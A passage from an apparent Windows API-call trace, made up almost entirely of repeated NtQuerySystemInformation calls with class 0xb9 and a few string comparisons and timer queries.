_String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0284.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce98, Length=0x50, ResultLength=0x0) [0284.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdc0, Length=0x38, ResultLength=0x0) [0284.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x28, ResultLength=0x0) [0284.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x28, ResultLength=0x0) [0284.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x28, ResultLength=0x0) [0284.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc60, Length=0x28, ResultLength=0x0) [0284.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdc0, Length=0x38, ResultLength=0x0) [0284.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cce0, Length=0x28, ResultLength=0x0) [0284.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cce0, Length=0x28, ResultLength=0x0) [0284.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdc0, Length=0x38, ResultLength=0x0) [0284.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc40, Length=0x20, ResultLength=0x0) [0284.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x20, ResultLength=0x0) [0284.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x20, ResultLength=0x0) [0284.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x20, ResultLength=0x0) [0284.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdc0, Length=0x38, ResultLength=0x0) [0284.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc40, Length=0x20, ResultLength=0x0) [0284.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbd0, Length=0x20, ResultLength=0x0) [0284.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbd0, Length=0x20, ResultLength=0x0) [0284.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d1a8, Length=0x50, ResultLength=0x0) [0284.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d120, Length=0x28, ResultLength=0x0) [0284.512] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0284.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d1a8, Length=0x50, ResultLength=0x0) [0284.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d1a8, Length=0x50, ResultLength=0x0) [0284.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d090, Length=0x50, ResultLength=0x0) [0284.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d010, Length=0x28, ResultLength=0x0) [0284.513] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0284.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d090, Length=0x50, ResultLength=0x0) [0284.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d090, Length=0x50, ResultLength=0x0) [0284.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d090, Length=0x50, ResultLength=0x0) [0284.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfc0, Length=0x38, ResultLength=0x0) [0284.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdf0, Length=0x28, ResultLength=0x0) [0284.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdf0, Length=0x28, ResultLength=0x0) [0284.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdf0, Length=0x28, ResultLength=0x0) [0284.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce60, Length=0x28, ResultLength=0x0) [0284.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfc0, Length=0x38, ResultLength=0x0) [0284.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cee0, Length=0x28, ResultLength=0x0) [0284.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cee0, Length=0x28, ResultLength=0x0) [0284.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfc0, Length=0x38, ResultLength=0x0) [0284.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce40, Length=0x20, ResultLength=0x0) [0284.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdc0, Length=0x20, ResultLength=0x0) [0284.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdc0, Length=0x20, ResultLength=0x0) [0284.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdc0, Length=0x20, ResultLength=0x0) [0284.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfc0, Length=0x38, ResultLength=0x0) [0284.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce40, Length=0x20, ResultLength=0x0) [0284.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdd0, Length=0x20, ResultLength=0x0) [0284.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdd0, Length=0x20, ResultLength=0x0) [0284.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.526] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xa78207d0f0 | out: lpSystemTimeAsFileTime=0xa78207d0f0*(dwLowDateTime=0x36eee769, dwHighDateTime=0x1d6666a)) [0284.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d1a8, Length=0x50, ResultLength=0x0) [0284.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0e0, Length=0x28, ResultLength=0x0) [0284.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cff8, Length=0x50, ResultLength=0x0) [0284.527] GetTickCount () returned 0x11872fb [0284.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cec8, Length=0x58, ResultLength=0x0) [0284.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x38, ResultLength=0x0) [0284.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc10, Length=0x28, ResultLength=0x0) [0284.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc10, Length=0x28, ResultLength=0x0) [0284.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc10, Length=0x28, ResultLength=0x0) [0284.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc10, Length=0x28, ResultLength=0x0) [0284.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x28, ResultLength=0x0) [0284.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x38, ResultLength=0x0) [0284.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd00, Length=0x28, ResultLength=0x0) [0284.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd00, Length=0x28, ResultLength=0x0) [0284.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x38, ResultLength=0x0) [0284.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc60, Length=0x20, ResultLength=0x0) [0284.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x20, ResultLength=0x0) [0284.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x20, ResultLength=0x0) [0284.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x20, ResultLength=0x0) [0284.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x38, ResultLength=0x0) [0284.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc60, Length=0x20, ResultLength=0x0) [0284.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x20, ResultLength=0x0) [0284.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x20, ResultLength=0x0) [0284.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cec8, Length=0x58, ResultLength=0x0) [0284.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cda0, Length=0x38, ResultLength=0x0) [0284.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x28, ResultLength=0x0) [0284.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x28, ResultLength=0x0) [0284.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x28, ResultLength=0x0) [0284.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x28, ResultLength=0x0) [0284.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc50, Length=0x28, ResultLength=0x0) [0284.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cda0, Length=0x38, ResultLength=0x0) [0284.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cda0, Length=0x38, ResultLength=0x0) [0284.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x28, ResultLength=0x0) [0284.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x28, ResultLength=0x0) [0284.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cda0, Length=0x38, ResultLength=0x0) [0284.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cda0, Length=0x38, ResultLength=0x0) [0284.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb40, Length=0x20, ResultLength=0x0) [0284.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0284.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0284.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0284.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x20, ResultLength=0x0) [0284.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cda0, Length=0x38, ResultLength=0x0) [0284.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc30, Length=0x20, ResultLength=0x0) [0284.552] NtQuerySystemInformation 